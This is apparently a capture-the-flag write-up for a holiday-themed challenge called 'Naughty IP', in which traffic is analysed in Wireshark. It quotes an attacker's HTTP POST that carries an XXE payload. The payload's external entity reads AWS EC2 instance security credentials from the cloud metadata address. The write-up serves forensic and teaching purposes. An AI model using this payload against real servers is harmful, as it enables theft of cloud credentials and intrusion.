Naughty IP
Difficulty:
Shown in Report
Alabaster Snowball is standing in the very dark.
Objective Image
Back
Challenge

Use the artifacts from Alabaster Snowball to analyze this attack on the Boria mines. Most of the traffic to this site is nice, but one IP address is being naughty! Which is it? Visit Sparkle Redberry in the Web Ring for hints.

Solution

Let's open up Wireshark again. As we know the source must be ip 18.222.86.32 (seen in the challenges before), and AWS IMDS lookups contain a special IP 169.254.169.254 we build the following filter:

ip.src_host == "18.222.86.32" and tcp.reassembled.data contains  "169.254.169.254"

We select the last entry and right-click -> follow -> HTTP stream:

POST /proc HTTP/1.1
Host: www.toteslegit.us
...
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY id SYSTEM "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"> ]>
<product><productId>&id;</productId></product>
HTTP/1.1 200 OK

So the URL fetched is http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance.

We get following hints:

Lock Mechanism

The locks take input, render some type of image, and process on the back end to unlock. To start, take a good look at the source HTML/JavaScript.

Content-Security-Policy

Understanding how Content-Security-Policy works can help with this challenge.

Input Validation

Developers use both client- and server-side input validation to keep out naughty input.